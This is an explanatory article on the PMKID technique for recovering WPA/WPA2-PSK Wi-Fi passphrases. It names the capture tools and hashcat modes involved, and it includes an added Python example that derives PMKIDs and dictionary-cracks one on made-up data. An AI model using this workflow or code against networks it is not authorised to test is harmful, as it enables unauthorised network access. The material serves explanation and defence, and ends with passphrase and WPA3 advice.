In October 2017, Mathy Vanhoef disclosed KRACK, an attack on the WPA2 4-way handshake that let an attacker within radio range decrypt traffic on many WPA2 networks (and, in some configurations, inject it). KRACK did not recover the network password, but it added urgency to the Wi-Fi Alliance's WPA3 launch, announced in early 2018, some fourteen years after WPA2. That launch looks timelier still now that a new way of attacking WPA2 has been found.
WPA2 is not as secure as we thought: good thing WPA3 is coming
The technique was found by Jens Steube, lead developer of hashcat, the password-recovery tool used by penetration testers to crack captured hashes. hashcat runs candidate passphrases through the WPA key derivation on graphics cards; the article quotes a rate of about 64,000 candidates per second on a single GTX 1080, and throughput scales with the number of GPUs.
The new attack lets an attacker recover the passphrase of a network protected with WPA/WPA2-PSK (pre-shared key), the mode that virtually every home and small-office router ships with, so any PSK network is a potential target. Whether a particular router hands over the data the attack needs depends on its roaming support (see the end of this article); the cracking step itself is the same offline dictionary or brute-force attack as before.
Steube and colleagues stumbled on the technique while looking for ways to attack WPA3. WPA3 will be considerably harder to attack this way because it replaces the PSK handshake with Simultaneous Authentication of Equals (SAE), a password-authenticated key exchange: a passive capture, or a frame obtained by actively associating with the access point, no longer yields anything that can be fed to an offline dictionary attack, so each password guess requires a live exchange with the AP, which can be rate-limited.
Unlike earlier WPA2-PSK cracking, the new attack does not need a captured 4-way handshake between a legitimate client and the access point (KRACK, incidentally, targeted the handshake itself and was never a password-recovery attack). Instead it reads the RSN IE (Robust Security Network Information Element) from a single EAPOL frame: the first message of the handshake, which the AP sends as soon as any station associates. The RSN IE is an optional field that, on APs with roaming support, carries the PMKID: a 128-bit value computed as HMAC-SHA1 over the string "PMK Name" and the MAC addresses of the AP and the station, keyed with the Pairwise Master Key (PMK) that the AP derives from the network passphrase.
The attack can be performed directly against the router without any connected user
This gives the attacker several advantages. No legitimate user needs to be present: the attacker associates with the access point (the router, for example) from their own device and the AP volunteers the PMKID in the first EAPOL message. Handshake capture, by contrast, required a real client to connect (or to be deauthenticated and reconnect) while the attacker was in range of both sides, and could fail when EAPOL frames were lost or retransmitted.
Besides, the PMKID is itself the cracking target, so once it has been obtained there is nothing left to capture: no nonces or replay counters to fix, no special capture format, just a hex string. hashcat 4.2.0 added two hash modes for it: 16800 (WPA-PMKID-PBKDF2), which derives the PMK from each candidate passphrase with PBKDF2-HMAC-SHA1 (4096 iterations) and compares the resulting PMKID, and 16801 (WPA-PMKID-PMK), which takes precomputed PMKs and skips PBKDF2 entirely. PBKDF2 is what makes WPA cracking slow, so 16801 only helps when PMKs for that exact SSID are already in hand. Getting the hash is now much easier, but cracking it is as difficult (or as easy) as it always was: the speed is set by PBKDF2 and the strength of the passphrase.
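To make the PMKID derivation and the two hashcat modes concrete, here is an added Python example; it is not code from the article or from the hashcat project. It derives the PMK and PMKID as 802.11i specifies for WPA2-PSK, writes hashcat's -m 16800 input line (PMKID*MAC_AP*MAC_STA*ESSID, all hex), and runs both a PBKDF2-style crack (what mode 16800 does) and a precomputed-PMK crack (what mode 16801 does) over a constructed wordlist. The ESSID, MAC addresses, passphrase and wordlist are made up, and the "captured" line is generated locally in place of a real hcxdumptool capture.

```python
import hashlib
import hmac

# Constructed demo data (not from a real capture): a fictional AP, a fictional
# station (the attacker's own interface) and a fictional network name.
ESSID = b"hashcat-demo"
MAC_AP = bytes.fromhex("00112233aabb")   # AP BSSID ("AA" in 802.11 terms)
MAC_STA = bytes.fromhex("aabbccddeeff")  # station address ("SPA")
TRUE_PASSPHRASE = "hashcat!"             # the secret the cracker is meant to recover


def pmk_from_passphrase(passphrase: str, essid: bytes) -> bytes:
    """WPA/WPA2-PSK key derivation: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32).

    The 4096 iterations are the expensive step and dictate the cracking speed.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), essid, 4096, dklen=32)


def pmkid_from_pmk(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """802.11i PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): first 16 bytes of the MAC."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def to_16800_line(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, essid: bytes) -> str:
    """Serialise as hashcat's -m 16800 input: PMKID*MAC_AP*MAC_STA*ESSID, each hex-encoded."""
    return "*".join(x.hex() for x in (pmkid, mac_ap, mac_sta, essid))


def from_16800_line(line: str):
    """Parse a -m 16800 line back into (pmkid, mac_ap, mac_sta, essid) as bytes."""
    pmkid, mac_ap, mac_sta, essid = line.strip().split("*")
    return (bytes.fromhex(pmkid), bytes.fromhex(mac_ap),
            bytes.fromhex(mac_sta), bytes.fromhex(essid))


def simulate_ap_m1(passphrase: str, essid: bytes, mac_ap: bytes, mac_sta: bytes) -> str:
    """Stand-in for what an AP with roaming enabled places in the RSN IE of EAPOL
    message 1 once a station associates. A real attack reads this from the capture."""
    pmk = pmk_from_passphrase(passphrase, essid)
    return to_16800_line(pmkid_from_pmk(pmk, mac_ap, mac_sta), mac_ap, mac_sta, essid)


def crack_pmkid_pbkdf2(line: str, wordlist):
    """Mode-16800 style: derive the PMK from each candidate passphrase, then test the PMKID."""
    pmkid, mac_ap, mac_sta, essid = from_16800_line(line)
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:   # WPA passphrases are 8..63 characters
            continue
        pmk = pmk_from_passphrase(candidate, essid)
        if hmac.compare_digest(pmkid_from_pmk(pmk, mac_ap, mac_sta), pmkid):
            return candidate
    return None


def crack_pmkid_from_pmks(line: str, pmk_table):
    """Mode-16801 style: PMKs are already known (precomputed for this ESSID), so PBKDF2
    is skipped and each candidate costs one HMAC-SHA1. pmk_table maps PMK -> passphrase."""
    pmkid, mac_ap, mac_sta, _ = from_16800_line(line)
    for pmk, passphrase in pmk_table.items():
        if hmac.compare_digest(pmkid_from_pmk(pmk, mac_ap, mac_sta), pmkid):
            return passphrase
    return None


# Constructed "capture" and a tiny constructed wordlist.
CAPTURED_LINE = simulate_ap_m1(TRUE_PASSPHRASE, ESSID, MAC_AP, MAC_STA)
WORDLIST = ["password", "12345678", "short", "hashcat!", "letmein1"]

if __name__ == "__main__":
    print("16800 line:", CAPTURED_LINE)
    print("recovered via PBKDF2 path:", crack_pmkid_pbkdf2(CAPTURED_LINE, WORDLIST))
    table = {pmk_from_passphrase(w, ESSID): w for w in WORDLIST if 8 <= len(w) <= 63}
    print("recovered via PMK table:", crack_pmkid_from_pmks(CAPTURED_LINE, table))
```

The loop in crack_pmkid_pbkdf2 is what hashcat parallelises across GPUs; nearly all of its cost is the pbkdf2_hmac call, which is why obtaining the PMKID more easily does not make the passphrase fall any faster. The PMK table path is only a shortcut when PMKs for that exact SSID already exist, since the SSID is the PBKDF2 salt and tables do not transfer between networks.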
To crack a password you need hashcat 4.2.0, the tool's latest version, together with hcxdumptool to request and capture the PMKID and hcxtools to convert the capture into hashcat's 16800 format. A dedicated graphics card is recommended, or several, as most pentesters use (up to 4 in most rigs). Some cracking systems, however, have as many as 3,500 graphics cards, which brings weak passwords down in a matter of minutes.
The people behind the discovery do not know how many devices and routers are affected. What they do expect is that it works against routers with roaming functions enabled (802.11i/p/q/r), which covers most modern models. Since the hash is now trivially obtainable, the passphrase is the only thing standing between an attacker and the network: use a long, random one (WPA allows up to 63 characters), replace any default passphrase printed on the router, and move to WPA3 as devices that support it become available.